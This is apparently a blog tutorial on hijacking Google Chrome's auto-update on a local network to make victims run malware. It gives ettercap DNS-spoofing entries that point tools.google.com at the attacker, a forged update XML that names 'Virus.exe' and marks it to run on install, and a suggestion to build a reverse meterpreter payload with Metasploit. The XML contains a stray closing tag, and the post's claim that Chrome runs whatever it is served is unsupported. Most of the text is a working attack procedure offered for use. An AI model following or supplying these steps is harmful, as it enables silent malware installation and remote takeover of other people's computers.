Beware: How Hackers can Instantly Infect Anyone Running Chrome

Well, I have to hand it to those genius’s… This one is quite interesting. Here, we are going to take a look at a Man in the Middle where DNS poisoning is used to masquerade as the Google Chrome Update Server. So, Google Chrome looks for an update EXE and then the hacker feeds them a malevolent EXE. Apparently Google Chrome swallows it whole and just runs the darn thing.

Prerequisites:

  • Apache and ettercap
    OR
  • Kali Linux

Givens:

IP 111.111.111.111 is the Attacker

IP 222.222.222.22X are the Victims

Let’s begin:

Google Chrome has a great little auto-update feature that runs every 15 minutes or so and downloads and runs an update [EXE]. By tricking the victim’s computer into thinking the Attack Computer is the update server, you can make anyone running Chrome on the network run the Malevolent EXE silently.

Let’s start off with the basic background knowledge. The hacker will to need to DNS poison the network and tell all computers that they are the update server.

(Please note, commands are done as if running Kali)

Shell:

find etter.dns

Copy the path to etter.dns (highlight, then ctrl+shift+C) and then run

nano /path/to/etter.dns

You will be presented with the edittable DNS file.

You want to add an entry of

“tools.google.com A 111.111.111.111
*tools.google.com A 111.111.111.111
www.tools.google.com A 111.111.111.111

ctrl+X and then SAVE.

Now, lets set up our server to serve out Virus.exe:

Direct all requests to your server to the following XML document we will make.

(For more info on the XML format, see Google’s Omaha Server Protocol v3)

First we need to gather our info.

Are we hitting 32-bit chrome, or 64-bit?

Most people are 64-bit these days, 64-bit means that for this example I’ll be doing 64-bit

appid=”4DC8B4CA-1DBA-483E-B5FA-D3C12E15B62D”
(you can easily grab the ID for 32-bit with Wireshark)

Now, we have our Virus.exe (easily make a reverse meterpreter EXE with Metasploit?)

Take the Sha-1(base-64) hash of the Virus.exe

EX: VXriGUVI0TNqfLlU02vBel4Q3Zo=

Then we craft our XML to serve:

<?xml version=”1.0″ encoding=”UTF-8″?>
<response protocol=”3.0″ server=”prod”>
<daystart elapsed_seconds=”56508″/>
<app appid=”{4DC8B4CA-1DBA-483E-B5FA-D3C12E15B62D}” status=”ok”>
<updatecheck status=”ok”>
<urls>
<url codebase=”111.111.111.111″/>
</urls>
<packages>
<package hash=”VXriGUVI0TNqfLlU02vBel4Q3Zo=” name=”Virus.exe” required=”true” size=”2983″/>
</packages>
<actions>
<action arguments=”” event=”install” run=”Virus.exe”/>
</actions>
</manifest>
</updatecheck>
<ping status=”ok”/>
</app>
</response>

Host the XML in the root of your server along with Virus.exe

Then open ettercap and

ettercap -T -q -i wlan0 -P dns_spoof -M arp // //

And now anytime GC goes to update, it will grab your virus instead of the actual update.

Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *